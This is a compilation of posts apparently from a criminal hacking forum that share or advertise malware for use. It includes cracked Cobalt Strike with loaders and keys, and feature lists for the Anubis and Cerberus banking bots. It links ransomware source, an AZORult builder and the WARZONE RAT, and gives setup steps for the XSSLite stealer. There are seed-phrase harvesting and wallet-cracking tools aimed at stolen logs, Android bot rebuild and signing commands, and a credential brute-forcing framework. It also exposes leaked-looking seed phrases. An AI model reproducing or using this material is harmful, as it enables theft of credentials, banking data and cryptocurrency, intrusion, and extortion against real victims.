You must have at least 5 message(s) to view the content.
С авто отключения протекта выложу позже, так же возможно отдам билдер с криптором.
Какая последняя версия етово зверя? Знает кто?
Hi guys;
Today CobaltStrike 4.4 Last edition has been cracked; so i'm sure alot of guys here waiting this day;
Cobalt Strike 4.4 (August 04, 2021) is release:
For more sure and saftey; it's better to check the files your self! so we are
in darknet; and none of us trust strangers; (you can create a jar package
using java ida IntelliJ once you check the files!
In the next week i'm going to make the most important parts in this version
which is stable in evading EDR/AV technique, keep tunned!
NOTE for all XSS members who vote in the contest and not!!
don't forget to vote for participate in Xss.is Context! 7days left & you have
ability to vote for 3 Participate !! no only 1
https://xss.is/threads/55078/
Code:Copy to clipboard
https://up.labstack.com/zQD87FRI
mirror download:
https://mirrorace.org/m/13c99
7af9c759ac78da920395debb443b9007fdf51fa66a48f0fbdaafb30b00a8a858 Cobalt Strike 4.4 Licensed (cobaltstrike.jar)
https://verify.cobaltstrike.com/
pass: r1z.xss
Anubis 2.5 (Android Bot)
там два конфига , не только в папке anubs но и в папке о1о они
должны быть одинаковые
остальное все - по ману
скачать:
You must have at least 15 message(s) to view the content.
Программа на Python 3.x производит рекурсивный поиск парольных фраз от
криптокошельков внутри файлов, проверяет их валидность
(т.е. выдает только те фразы которые удовлетворяют стандарту bip39) и выводит
парольную фразу и путь к файлу в котором она была найдена.
Валидация фраз на соттветствие стандарту bip39 производится с помощью
библиотеки из репозитория аппаратного криптокошелька trezor
https://github.com/trezor/python-mnemonic
Пример вывода программы (пути заменил на zzz что бы не палить имя юзера и тд)
Spoiler
Hidden content for authorized users.
/home/zzzzz/zzzzzz/Files/wallety/New text document.txt
rude cool annual mango hazard stable affair payment kingdom naive crush cancel
/home/zzzzz/zzzzzz/Files/wallety/tron.txt
awake window awful off hero coach salmon deer medal bleak crisp noodle
/home/zzzzzzz/FileGrabber/Users/aliraza/Documents/atomic backup pharse
wallet.txt
focus city expand planet upon power stick begin usual cereal spring damage
/home/zzzzzzz/FileGrabber/Users/tunas/Desktop/torrrez codes.txt
sketch swift bronze stadium monster agent office error lock spare split frown
/home/zzzzz/zzzzzz/Files/wallety/ark wallet.txt
rude cool annual mango hazard stable affair payment kingdom naive crush cancel
0. Необходим Python версии 3.8 и старше и библиотека pbkdf2 для Python
1. Для работы программы необходимо в теле seed-parser.py в 12 строке заменить source на полный путь до папки с логами.
Если у вас логи от говностиллера и все сграбелнные файлы хранятся в отдельных
архивах
(наверное что бы хозяева стилера успели быстрее вас спиздить крипту)
Spoiler: Для Linux
Hidden content for authorized users.
В консоли перемещаемся в паку с логами (должен быть утсановлен p7zip-full и
p7zip-rar)
cd /home/user/папка-с-логами
и выполняем
find /home/user/папка-с-логами -type f -name '*.zip' -execdir 7z x -y {} +
Все, все вложенные архивы будут рекурсивно распакованы. Так же на всякий можно
сдела то же самое для rar часто грабятся файлы типа wallet.rar с бекапами
ключей и валлетов.
Распаковаться он не распакуется но по запросу пароля вы поймете где он лежит и
сможете попытаться подобрать пароль из тех что сграбил стилер.
Spoiler: На Windows (всех версиях)
Hidden content for authorized users.
Пользователь виндовс должен только страдать
2. Можно настроить какие файлы программа будет пропускать, по умолчанию это
gif ico jpeg png jpg cab 7z rar zip sys dll
Для настройки своих исключений нужно просто добавить расширения которые хотите
что бы программа пропускала
В файле seed-parser.py с 14 строки вставляете свои расширения (в таком же
формате например '.iso', ).
3. Можно настроить какие именно фразы вы хотите искать по умолчанию ищутся фразы длинной 12 и 24, программа так же поддерживает фразы длинной 15, 18 и 21 слов. Что бы включить их поддержку нужно дописать цифрами их в фигрных скобках в 27 строке в seed-parser.py
4. Парсер находит фразы с разной манерой записи вне зависимости от того где они упоминаются в начале середине или конце файла.
1. big
2. room
3. ocean
4. valley
...
1. big 2. room
3. ocean 4. valley
...
big room ocean valley ...
big
room
ocean
valley
....
и т.д.
5. Программа может искать фразы от кошельков созданные на других языках (поддерживаются языки: Французкий, Итальянский, Няшный, Корейский, Китаски и официальный язык порноделов) для того что бы программа искала фразы на других языках нужно в папке wordlist найти папку Other выбрать там словарь, переименовать его в english.txt и заменить тот что по умолчанию.
6. Если в командной строке программы указать путь до папки например python3.8 seed-parser.py /home/user то программа отработает в фоновом режиме при этом сохранив результаты работы в файл с именем в виде даты и времени.
Тестировал на Ubuntu 20.10 Python3.8 должно работать на виндовс (лучше в повершелл запускать а то вывод будет читать неудобно)
ПРЕДУПРЕЖДЕНИЕ
При большом объеме программа выводит много мусора. Пользователям linux будет с
этим легко справится парсив только файлы граббера например
python3.8 seed.py | grep Files
где Files название папки в логе с файлами грабера
или
python3.8 seed.py | grep Autofill что бы отпарсить данные с автозаполнения.
Так же советую с помощью sed отсечь все фразы в которых есть более двух повторов. Ну те кто на линуксе думаю сообразят как мусорные строки выкинуть из вывода
В будущем планируется добавить следующий функционал
1. Вывод после каждой фразы по 3 биткоин кошелька и приватных ключа
сгенерированных с помощью этой фразы всех трех типов (получится 9 кошельков: 3
кошелька P2PKH, 3 кошелька P2SH и 3 кошелька P2WPKH SegWit)
2. Вывод 3х эфириум кошельков и приватных ключей сгенерированных с помощью
этой фразы
3. Добавление черного списка названий файлов и папок которые будут
пропускаться.
4. Прочие улучшения по отсечению мусора.
5. Многопоточность (хотя и так вроде бы работает не медленно)
You must spend at least 30 day(s) on the forum to view the content.
You must have at least 20 message(s) to view the content.
Spoiler: Специальная версия для тех кто хочет продавать этот софт.
Ты пидор если хочешь торговать пабликом
Donate
Bitcoin bc1qphw8hltvwp6gqn6rx3rwgtuzxrcar6ap50rcqr
ETH 0x1C3136Ad67718Ebb6B235e159db761c5d657d0cf
AZORult 3.2 builder
билдер, версия предпоследняя
You must have at least 10 message(s) to view the content.
AZORult 3.3 builder
билдер, последняя версия
You must have at least 10 message(s) to view the content.
все запускать на свой страх и риск
Hi all,
Today i'm sharing with XSS community the cobaltstrike 4.5 Loader with original key {f38eb3d1a335b252b58bc2acde81b542} after it's get published.
December 14, 2021 - Cobalt Strike 4.5
The most important features here:
The loader i use here is taken from here,
but it's only supported for cobaltstrike 4.4, and this modified update
supportingcobaltstrike 4.5 !
and will be updated to 4.6 soon.
to modify your own copy of cobaltstrike which give you ability to bypass the
most moderm EDR/AV such like Kaspersky i did bypass in the contest topic you
can learn more from.
---------------------
English readers.
Hide your CobaltStrike like a PRO! & Bypass Kaspersky End Point Security
AV/EDR (PART 2)
Russian readers. Thanks for translate yashechka
Hide your CobaltStrike like a PRO! & Bypass Kaspersky End Point Security
AV/EDR (PART 2)
---------------------
NOTE:
To start working in the loader you need to download cobaltstrike.jar or
any other version you preffer and paste it in the same directory
withXSSagent.jar and change the key in teamserver, start.*
---------------------
Code:Copy to clipboard
4.0 1be5be52c6255c33558e8a1cb667cb06
4.1 80e32a742060b884419ba0c171c9aa76
4.2 b20d487addd4713418f2d5a3ae02a7a0
4.3 3a4425490f389aeec312bdd758ad2b99
4.4 5e98194a01c6b48fa582a6a9fcbb92d6
4.5 f38eb3d1a335b252b58bc2acde81b542
Download cobaltstrike.jar all version from
4.0 due 4.5.
Download XSSagent Loader (XSSagent.jar).
Pass r1z.xss
PS:
Who need the all files of cobaltstrike and XSSagent write requesthere
,not pm!
a5e980aac32d9c7af1d2326008537c66d55d7d9ccf777eb732b2a31f4f7ee523 Cobalt Strike
4.5 Licensed (cobaltstrike.jar)
https://verify.cobaltstrike.com/
pass: r1z.xss
ARKADAŞLAR EVET SABAHTAN DÜZENLEMELER / İLAVELER YAPIYORUM ŞİMDİ YAPMAMI TAM OFİS KONUSUNUN HAZIR OLDUĞUNU DÜŞÜNDÜM! [Bazı Özellikler Kaldırılmadığından]
[]](https://hizliresim.com/VMLAJB)
Dosya Yöneticisi =>
Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.
Görev Yöneticisi =>
Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.
Masaüstü İzleme =>
Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.
Şifre Bölümü =>
[url = https: //i.hizliresim.com/gWAnNQ.png]
Kullanıcı Ayarları =>
Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.
Eğlence Menüsü =>
Bu resim yeniden boyutlandırıldı, tam halini görmek için
tıklayınız.
Mod Anubis 2.5 от 10.01.2020 и Anubis Loader(loader_maza) сорцы
Сливаю исходники лоадера Мазы и так же сливаю Анубис мод, который на експе продавали за 5к$ и сейчас стараются всякие долб..бы продавать.
Лоадер обычный, ничего необычного, имя пакета нужно шифровать в md5
Функционал банкбота:
- админ права
- отправка СМС
- перехват смс/скрытый перехват СМС
- получить все СМС на телефоне
- получить все установленные приложения
- USSD
- показать сообщение
- Push
- авто Push
- геолокация
- веб-инжекты включая криптовалютные, работают на 4-9 версиях
- граббер карт(5 видов)
- запуск инжекта(граббера) по интервалу
- получить все контакты
- спам по всем контактам бота или по вашей базе номеров
- доступ к файловой системе(rat) скачивание фото,аудиозаписей,текстовых
форматов.
- стрим экрана(rat) - от версии 5.0 и выше
- стрим звука(rat)
- открыть url в браузере
- открыть url в активити бота
- переадресация звонка
- криптолокер
- удаленный запуск установленных приложений
- поиск файлов по сигнатурам
- запись звука(2 вида)
- кейлоггер (на браузер не распространяется)
- Socks5 модуль - от версии 5.0 и выше
- получить IP бота
- Автоматическое отключение Google Protect, работает после обновления
13.01.2020
- Решена проблема с засыпанием ботов
- Автоматическое удаление бота (не нужно подтверждения на стороне бота),
следов не остается.
- Отображение модели мобильного телефона.
- Пошаговое получение данных из инжекта (падает все по очереди, логин, пасс,
номер карты, потом дата, потом цвв). В случаях когда вход в онлайн по карте,
карту
получаете теперь почти наверняка, холдер обычно боится вводить CVV.
- Все разрешения берутся за 1 раз и незаметно, в отличии от старой версии с
5ю окнами.
- Удаление приложений с телефона по команде из админки.
- Автоудаление приложений по расписанию. Заливаете линки на антивирусы, бот
чистит
телефон от них через указанное время после инсталла.
- Включение кейлогера по расписанию.
- Запуск инжектов по расписанию. Через указанное время ведется поиск по
приложениям,
нужное - запускается.
- Расширенная панель по сортировке, поиску ботов.
- Панель на русском
- Блокировка ПУШ сообщений любых приложений
Всяким там любителям халявы пишу, что не надо в теме или лс просить личный,
даю только тем у кого немного не хватает до хайда, остальным просьба не
писать.
Хайд делается для того, чтобы увидеть, скачать могли активные пользователи,
которые приносят пользу форуму в его развитии.
You must have at least 180 reaction(s) to view the content.
I 'm Sharing Both $30k Resources For Free For Anyone Who Downloads Directly Without Any Password, Along With Direct Installation, Just Do The Rest On Your Own.
You must have at least 200 reaction(s) to view the content.
I open a thread to post a collection of old banking malware for study.
I apologize for my English, I am still learning
I start with Kronos botnet. It 's my old panel + exe (without crypt)
Panel + Bin [+3 updates]
[CLIKE]
https://www.sendspace.com/file/3tvp6t
Passwords: xss.is
[/CLIKE]
I will continue publishing when I have free time
=========( Сборник тулз для спаммера )===========
Буду пополнять по тихоньку. Если хотите ченить отпостить - постите
========================================)
=================) С П А М (================
phpmailer - незаменимый скрипт в арсенале спаммера. хакнул хост,
закачал - и спамь
Оч. удобно.
fxStyle Bulk Mailer - зделан на javascript'е. Не очень нравиться. Просто балкмейлер.
Качать: http://www.tucows.com/get/384169_144935
Code:Copy to clipboard
User Name: member27@fxstyle.com
Registration Code for Bulk Email Sender: 8069038061
=========) Email collection / Коллекторы (==========
eMail SPideR 8 - фуйня но работу свою делает. Собирает мыла по указаномму УРЛ. Написан на JAva посему медленный и глючный.
Качать: http://www.email-business.com/downloads/EmailSpider8.exe
Code:Copy to clipboard
name : molinari
Code : KVPB-QSRP-YHUP-SVTM
Тут будем собирать сорсы вирусов ТОЛЬКО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ
Администрация, хостинг и пр. лица причастные к проекту не несут никакой
ответственности за несанкционированное использование выложенной инфы.
Начнем:
mydoom.a sources
Известный червяк.
HOOKER 2.5
Что-то типа кейлога
Панель SIB от конца 17 года.
О шеллах, дырах - понятия не имею, панель не моя, не устанавливал и не
использовал ее никогда.
полный комплект тут -
https://anonfile.com/I9H4Y7rdbb/Panel_zip
(инструкция, база данных, доп файлы и тп)
еще то что может понадобится возможно -
https://anonfile.com/q4GdYar2b4/_zip
(crontab и тп)
п.с. просто парсинг с ПС, и далее чек и раскрутка. Паука нету.
п.п.с Кто поставит и скинет старику установленую сиб доступ, был бы благодарен, просьба кто сможет и кому не в падлу, и не жалко, скиньте в ЛС установленную, ибо мозгов не хватает у меня.
v2 версия. Ласт.
Так как наша команда (до этого команда) вела этот бизнес чисто, максимально красиво, то и завершим мы его красиво.
Перед 70% клиентов фин обязательства уже закрыты. Оставшихся просим отписать в ЛС или в телеграмм, не забыть написать свою жабу, ключ лицензии и ip сервера. Это нужно для того, чтобы я убедился в том, что вы владелец лицензии. Желательно ещё apk файл приложить.
Исходники на растерзание, специально для xss.is
Cerberus v1 + Cerberus v2 + install scripts + admin panel + sql db
Hidden content for members of the Premium groups.
Я занимался разработкой рансомваре и я хотел бы поделиться с вами, ребята. Поделитесь, пожалуйста, своим мнением по этому поводу. Какую функцию вы бы хотели видеть в этом рансомваре?
Ссылка для скачивания: https://github.com/Hetropo/ryuk-ransomware
попробуйте только на виртуальной машине
Программа на .NET Core 6.
На вход принимает папку с логами и перерабатывает их в цикле
1. Ищет файлы .log , как правило они относятся к метамаску , браве и так
подобным, собирает из них vault
2. Ищет все пароли и автозаполнения
3. Подбирает пароль к vault
4. Если все прошло удочно собирает из мнемоники и пароля адрес
5. Проверяет баланс на debank
На выход выдает в консоль и txt файл данные в формате:
Лог: C:\Users\USERNAME\Desktop\ПАПКА\ПАПКА В ПАПКЕ
Кол-во кошельков: 2
Кол-во паролей: 2179
Мнемоника: tortoise produce type multiply chest acquire love maximum flat lion
pact steak
Пароль: 993675871h
Адрес: 0x171D27C2acE5bdffE4c3A08cee337b6fbe52A135
Баланс: 0
Исходный код Paradise Ransomware.
Mega:
You must have at least 50 reaction(s) to view the content.
Бот писался на заказ. Клиент слился.Что умеет. СМС перехват скрытно, автопуши
банков и картона,ручной запуск пушей, отправка смс, запуск инжектов, работа
инжектов на всех версиях андроида, инжекты хранит на телефоне холдера,скачка
смс, спам по контактам, автокрипт бота,шифрование траффа и дохрена что еще все
описывать не хочу.
Бот не работает по ру.Крипт апи описывать в админке не стал лень если что
позже выложу инструкцию.Бот работает на всех версиях андроид, тестировался и
на последних 8-9.Установка простая есть мануал, заливаем на хостинг,
прописываем базу в конфиге, заливаем базу.Нужен крипт, с криптом % 70 ботов
живут неделями. По картону на нормальном траффике % 10-12 примерно, траффик с
гугла. Палит пока 1 ав.Надеюсь сэкономить n k$
Сборка бота:
Билд апк, ставим apktool
Распаковываем апк командой apktool d -f app.apk
Рекурсивно меняем адрес админки (http://localhost/), для любителей Windows
ставим Notepad++ выбираем функцию заменить во всех файлах.
Если нужно сменить иконку идем в папку apk/app/res/mipmap-xxxhdpi и меняем
иконку ic_launcher.png на нужную, название оставляем прежнее.
Название приложения можно сменить в манифесте
Все собираем билд apktool b app -o new_app.apk
Подписываем приложение командами
echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA
jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore
mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456
На этом вроде все!
Кто захочет отблагодарить BTC 1BgTjgmwXZaMYeCmDhhyYXzsbYv9bFcbpi
Если возникнут проблемы спрашивайте.
Линк
Пароль xerxes
Я не являюсь автором данного продукта!!! Всё написанное ниже ни кого ни к чему
не обязывает и не сподвигает на какие либо действия!!!
Данный rat хороший конкурент hvnc и hrdp из тех которые есть на рынке. Главные
его плюсы это работа на всех версиях windows, нет ни каких зависимостей,
лёгкий билд, простой интерфейс, функционален, нет ни чего лишнего и не
понятного, есть свой крипт за отдельную плату, а главное это доступность по
цене. Вы можете всего за 23$ купить месячную лицензию, за 50 на три месяца и
за 490 на пол года. С лицензией на пол года идёт бонусом Rootkit позволяющий
вернуть "клиента" в случаи удаления. Так же у них есть крипт за 100$ в месяц и
за 200 три месяца. Есть хорошая поддержка клиентов с отзывчивым саппортом,
продукт поддерживается и обновляется.
1. Родная, независимая заглушка. Заглушка этого RAT была написана на C ++,
что делает его независимым от .NET Framework.
2. Удаленный рабочий стол. Функция удаленного рабочего стола реализована с
помощью специально созданного модуля VNC.
3. Скрытый удаленный рабочий стол. Модуль HRDP позволяет вам войти на
удаленный компьютер, не зная никого! Учетная запись Windows, созданная этим
модулем, автоматически скрывается от отображения при запуске Windows. Он был
создан с использованием этого замечательного
GitHub .
4. Повышение привилегий (Обход UAC). Повышение привилегий до Администратора
необходимо для использования модуля HRDP. Это необязательно и выполняется по
запросу из графического интерфейса WARZONE. Эта функция была протестирована и
доказана для работы в операционных системах Windows от Windows 7 до даже самой
последней Windows 10. Это делается с помощью Центра обновления Windows.
5. Удаленная веб-камера. Если к удаленному компьютеру подключена веб-камера,
вы можете просматривать прямую трансляцию в модуле удаленной веб-камеры.
6. Восстановление пароля. Захватывает пароли из следующих браузеров:
- Chrome,
- Firefox,
- Internet Explorer,
- Edge,
- Outlook,
- Thunderbird
- Foxmail
Включить автоматическое восстановление паролей, чтобы получать пароли, не
касаясь каких-либо кнопок!
7. Файловый менеджер. Загружайте и скачивайте файлы на высокой скорости. Вы
также можете выполнять и удалять файлы. Вы можете скачать и загрузить файлы
любого размера без проблем. Вы также можете выполнять файлы удаленно.
8. Скачать и выполнить. Получите прямую ссылку для загрузки вашего файла и
запустите ее на удаленном компьютере.
9. Живой кейлоггер. Вы можете просматривать клавиши, нажатыми на удаленном
компьютере в режиме реального времени.
10. Удаленная оболочка. Отправить команды в CMD удаленного компьютера.
11. Менеджер процессов. Просмотр и уничтожение процессов с помощью диспетчера
процессов.
12. Обратный прокси. Просматривайте Интернет с IP-адресом удаленного
компьютера!
13. Автономный кейлоггер. Keylogs сохраняют все действия клавиатуры Вашего
"клиента"!
Скришот
YouTube канал
Отзывы
P.S. WARZONE RAT считаю одним из лучших из тех которые есть на рынке, но это моё сугубо-личное мнение.
XSSLite - стиллер с веб-панелью, предназначенный для сбора различных данных с компьютера и отправки их на ваш сервер.
Click to expand...
Spoiler: Функционал
1. Сбор браузеров Chromium
2. Граббер файлов с рабочего стола
3. Сбор абсолютно всех плагинов из браузера
4. Сбор криптокошельков
5. Сбор информации о системе
6. Расшифровка логов на стороне сервера
Spoiler: Настройка и установка панели
1. Купите VDS
2. Откройте порты
3. Установите Python 3.11
4. Запустите Install.bat и ожидайте скачивания всех библиотек
5. Зайдите в файл config.json
6. Замените localhost на ip вашего VDS
7. Замените 80 на порт который вы открывали
8. Замените login и password на тот что вам нужно, эти данные будут
использоваться для входа в панель
9. Зайдите В CMD в папке XSSLite и введите команду python start.py
Теперь ваша панель готова и вы можете войти в нее перейдя по ссылке которую вывело в консоль
Spoiler: Настройка и компиляция билда
1. Зайдите в папку XSSLite\Client\Client и откройте config.cs а затем
замените ссылку на ссылку вашего сервера
2. Откройте Client.sln находящийся в папке XSSLite\Client
3. Скомпилируйте в режиме Release
Теперь ваш билд готов и уже можно лить трафик
Spoiler: Почему я решил выложить подобный софт?
Изначально я делал RAT+Stealer в одном, для того чтобы в дальнейшем его продавать, и я его уже дописал. Но решил, что лучше перепишу его на C++. В этот момент я узнал о конкурсе и решил, что переделаю свой софт под просто stealer. В итоге вырезал функционал RAT и пару функций стиллера тоже (а то слишком жирно будет подобный готовый софт выкладывать в открытый доступ). Ну вот так появился этот бесплатный проект.
Spoiler: На чем написан проект?
Серверная часть (Панель) написана на Python Flask.
Клиентская часть написана на C#.
Spoiler: Как реализован сбор и отправка куки, паролей на сервер?
Создается копия файлов куки и паролей. Также софт получает ключ dpapi и засовывает это все в виде байтов внутрь json. Затем отправляется на сервер. Уже на сервере происходит расшифровка полученных данных с помощью aes. После расшифровки всех данных они записываются уже в привычные txt файлы.
Spoiler: Почему я решил сделать расшифровку на стороне сервера?
Потому что это должно помочь снизить детекты на билде, так как происходит меньше подозрительных действий. Ну и просто потому что мне было проще написать расшифровку на питоне, чем на C#.
Spoiler: Посткриптум
Данный софт всего лишь черновой вариант того, что я планирую сделать. В будущей версии, которая будет предназначена для продажи, я перепишу клиентскую часть (билд) на C++ и также добавлю новый функционал. Но раз этот вариант программы черновой, это не значит, что с ней нельзя работать. Эта версия вполне пригодна и готова к использованию; главное, не забывайте криптовать билд.
Spoiler: Ссылка на скачивание исходников проекта
https://mega.nz/file/pSd2yaAB#IOHY0T2f7mqpNMT9NtQbQtiNzrj7CLR9lLqdM-3uumM
Скрипт для создания фэйков, закодированный:
[удалено, по просьбе автора]
_Введение _
Когда я только увидел что обьявлен новый конкурс на ХСС, сразу решил что буду
участвовать. Однако возник вопрос, с каким проектом лучше всего зайти в
конкурс. Я долго выбирал между тем, чтобы написать мессенджер на замену Токса
с обнаруженной RCE, или же написать брут, которых я написал целую кучу и
тележку на Delphi. Но понял, что начни делать я месседжер то я точно не успею,
да и опыт написания брутов/чекеров у меня весьма обширный. Я писал их на любой
вкус и цвет, разбирал мобильные приложения, разбирался в шифрования на
различных сайтах. С учетом всех этих аспектов я понял, что я буду делать. Но
вопрос был в другом, брут должен быть по настоящему уникальным, а не просто
еще одним брутом под один сайт с загрузкой базы и проксей.
Преимущества:
1. Все в одном месте
Когда часто занимаешься написанием брутов, у тебя скапливается целая куча
всего — скомпилированные бруты с результатами, исходники. Это всё разбросано
по разным папкам и как-то неудобно. А если добавить к этому еще какую-то фичу,
приходится заходить в каждый софт, дописывать и компилировать, что забирает
уйму времени.
2. Современный стек
Обычно бруты пишут на Delphi или C#, но эти языки уже немного устарели для
этой задачи. Либо же бруты пишут с использованием OpenBullet или Private
Keeper, и таких была еще целая куча, но остальные как-то не сильно прижились.
Я выбрал Golang за его выдающуюся производительность при высоких нагрузках и
эффективную работу в многопоточке. Это может быть не тот же ООП-язык, но для
поставленных целей он отлично подходит.
3. Кросс-платформенность
Большинство брутов создаются под Windows для удобства конечного пользователя.
Но использование Golang позволяет компилировать его под различные операционные
системы без проблем. Так что помимо Windows, мы можем легко работать на
серверах под Linux, что добавляет гибкости и многофункциональности.
4. Web-морда вместо GUI
Те, кто брутит, обычно используют выделенные серверы с Windows, управляя ими
через RDP. Это дорого и не всегда удобно. Работать с брутом как с веб-сайтом
гораздо удобнее. Открываешь вкладку в браузере и работаешь там.
5. Сохранение всех настроек в пресеты
Для того чтобы не вводить настройки каждый раз заново, я реализовал пресеты.
Указал источник прокси, их тип, и потом просто выбираешь этот пресет. Также
сохраняется остаток, результаты можно скачать в txt или xlsx формате. Также
если брут был остановлен по какой-либо причине его можно запустить повторно и
не нужно брать остаток запихивать его по новому и прописывать все настройки
снова, что как по мне тоже очень удобно.
6. Никаких ограничений ядра для разработчиков
В универсальных брутах накладываются определенные ограничения на разработчиков
проектов. У меня модуль — это микросервис с одним эндпоинтом, и его можно
написать на любом компилируемом языке. Входные данные в него, он выполняет
свою магию и говорит гуд, бед, ошибка и так далее. Никаких ограничений ядра
для разработчиков.
Инструкция по использованию
Алгоритм использования программы примерно следующий:
Теперь давайте пробежимся по каждому пункту подробнее
Комбо листы**
**
Для удобства хранения баз данных я добавил возможность создавать папки и
группировать базы внутри них. Учитывая, что баз данных может быть много и по
разным темам, это сделает навигацию проще. Просто кликните правой кнопкой мыши
в свободном месте и выберите "Создать папку" или "Создать комбо-лист".
Чтобы создать папку, достаточно ввести название папки в появившемся модальном окне после нажатия правой кнопки мыши.
Комбо-лист работает немного по-другому. Он позволяет объединить несколько
файлов или ссылок, чтобы сформировать один общий список. Например, вы можете
указать файл на сервере и ссылку на Sendspace, где также хранится база данных,
и получить один комбо-лист с данными из нескольких источников. Вы также можете
указать одну ссылку или файл, в зависимости от вашего удобства. При создании
комбо-листа нужно указать тип данных, которые будут включены в него.
Пока что, в настоящее время можно только указывать прямые ссылки на файлы, что
действительно удобно, если ваши базы данных хранятся в облаке. Второй вариант
загрузки баз из файла, который находится на той же машине, где запущен софт.
Пока не сделал возможность выбирать файл с той тачки, где сидит пользователь.
Я решил не включать эту функцию пока что, потому что знаю, что некоторые
пользователи загружают огромные базы с несколькими миллионами строк и
оставляют это на ночь. Загрузить такие большие базы данных сюда было бы
довольно сложно, поэтому я решил отложить эту функцию на потом. Однако, если
вы запускаете софт на той же машине, где и находитесь вы, то указание пути к
файлу не представляет проблем.
Если хотите удалить папку, то сначало надо удалить вложенные в нее элементы.
Если хотите удалить комбо лист, то не должно быть никаких связанных с ним
сессий. Если на ФО есть клауд, софт его не обойдет, по этому смотрите чтоб
клаудфлара не было на ресурсе куда залита базка.
Прокси пресеты
Тут это выглядит примерно следующим образом, собственно имеет определенную
схожесть с комбо-листами, только здесь я не стал делать папки. Как правило
прокси грузят либо из файла, каждый раз разные, либо по АПИ ссылке всяких
сервисов таких как адвансы, бесты или авм, вообщем по вкусу и цвету... и там
уже они в режиме реального времени обновляются с какой-либо переодичностью.
Бывали и такие случаи когда прокси записывают в файлик на диске и уже из него
обновляют с определенной переодичностью в бруте. В этом плане использовать
пресеты удобно использовать. На случай если это разовая загрузка из файла, в
котором прокси быстро сдохнут, то можно не создавать пресет, а сразу грузить
прокси в сессии, для этого есть отдельная кнопка в сессиях, выбираете ее и
грузите там уже свой файл с диска.
Но все же давайте вернемся к пресетам.
При использовании пресета для загрузки прокси по ссылке или из файла на диске,
вы указываете наименование пресета. Если прокси будут обновляться с
определенной периодичностью, вы ставите галочку напротив интервала и
указываете время в секундах.
Таймаут соединения с сайтом для прокси подразумевается как обычно, это время
ожидания ответа от сервера при подключении к нему.
Как и в случае с комбо-листами, вы можете указать несколько источников, из
которых будут браться прокси. Если файл находится на вашей тачке, то
автообновление прокси для него не будет работать, и программа будет всегда
брать данные из загруженного вами файла. Это вполне логично.
Для удаленных файлов и ссылок автообновление будет активно. Вы можете выбрать
несколько типов прокси: HTTP/S, SOCKS4, SOCKS5. Это означает, что в одной
сессии брута могут использоваться сразу несколько разных типов прокси. Это
удобно, так как вы можете указать несколько ссылок с разными типами прокси, и
программа будет использовать их все вместе.
Модули
Собственно сама вкладка очень простая, жмякаете добавить, загружаете файлик
модуля и он подтягивает его в эту вкладку. А вот как делать сами модули, это
уже отдельная история.
Модуль представляет собой независимый микросервис со своей собственной
спецификацией написания. Хотя модуль можно писать на любом языке
программирования, я бы все-таки рекомендовал использовать Go, поскольку он
компилируется в единый исполняемый файл и легко запускается на любой
платформе. Однако следует помнить, что если ваш BruteCore запущен на Linux, то
модуль также должен быть скомпилирован под Linux, и аналогично для Windows.
Когда вы загружаете модуль, он запускается с параметром "-getinfo", и модуль
должен вернуть JSON следующего формата:
JSON:Copy to clipboard
{
"name": "TestModule",
"version": "1.0.0.0",
"author": "0xUser",
"data_type": 9
}
Поле "data_type" определяет тип данных комбо-листа, с которым работает модуль. Вот возможные значения:
Code:Copy to clipboard
4 DATA_TYPE EMAIL
5 DATA_TYPE USERNAME
6 DATA_TYPE PASSWORD
7 DATA_TYPE PIN
8 DATA_TYPE USERNAME:PASSWORD
9 DATA_TYPE EMAIL:PASSWORD
10 DATA_TYPE DATA
Все вышеперечисленные типы вы можете найти в таблице reference в БД которая
лежит рядом с проектом. Если какого-либо поля из выше приведенного формата
json нету в модуле, BruteCore установит значение none, как выше на картинке в
поле “Версия”. Сами модули сохраняются в папке modules рядом с софтом.
Если какого-либо поля из вышеприведенного JSON отсутствует в модуле, BruteCore
установит его значение в "none".
Модули сохраняются в папке "modules" рядом с программой.
При запуске модуля для перебора, он вызывается с аргументом "-port",
указывающим порт, на котором должен быть запущен микросервис.
Модуль должен иметь эндпоинт POST "/ExecuteModule", который принимает JSON
следующего формата:
JSON:Copy to clipboard
{
"email": "0xUser@0xuser.cf",
"username": "0xUser",
"password": "xss.password",
"pin": "1234",
"data": "example_data",
"timeout": 15000,
"proxy_host": "127.0.0.1",
"proxy_port": 8080,
"proxy_type": 18
}
Практически все поля являются опциональными. Практически все поля являются опциональными, некоторые из них могут отсутствовать, например если брут идет без прокси то соответствующих полей в json не будет, если был выбран 9 тип комбо-листа то будут присутствовать поля email и password и уже соответственно по разным типам комбо-листа. Сервис проводит определенные действия с данными и возвращает JSON следующего вида:
JSON:Copy to clipboard
{
"status": 25,
"log": "proxy: 127.0.0.1:8080 \n some additional data in log"
}
Поле log является опциональным и впринципе может отсутствовать если оно вам не нужно. Статус может иметь следующие значения:
Code:Copy to clipboard
25 RESULT Хорошие
26 RESULT Плохие
27 RESULT Ошибки Соединения
28 RESULT Ошибки ПО
29 RESULT Капча
30 RESULT С балансом
31 RESULT Пустышки
32 RESULT Зарегестрирован
33 RESULT Залимиченные
По идее всю основную работу делают модули, сам же БрутКор выступает в роли
некоего оркестратора, который запускает нужный сервис, поддерживает его в
рабочем состоянии, отправляет на него входные данные, дальше происходит
модульная магия, “особые физико-математические вычисления” в результате
которых мы и узнаем гуд, бэд это или еще что-то.
ВАЖНО!! Поскольку мы работает уже с скомпилированными модулями, там могут быть
всякие “закладки”, ведь тут для разработчика нет абсолютно никаких ограничений
в плане того какой код писать какие библиотеки использовать и т.д., поэтому
стоит быть очень аккуратным и использовать модуль только от доверенных людей,
либо писать модули самому. Береженного бог бережет!
Ниже в статье вы можете найти пример готового модуля и использовать его как
шаблон для написания своих модулей.
Сессии
В сессиях все относительно просто, создаете новую сессию кнопочкой добавить
потом нажимаете на стрелочку справа и переходите к деталям конкретной сессии.
Выбираете комбо-лист который хотите брутить, после чего вы можете выбрать
прокси либо из готового пресете, либо уже загрузить из файла, который есть на
тачке с которой вы подключаетесь, если хотите брутить без прокси то ничего не
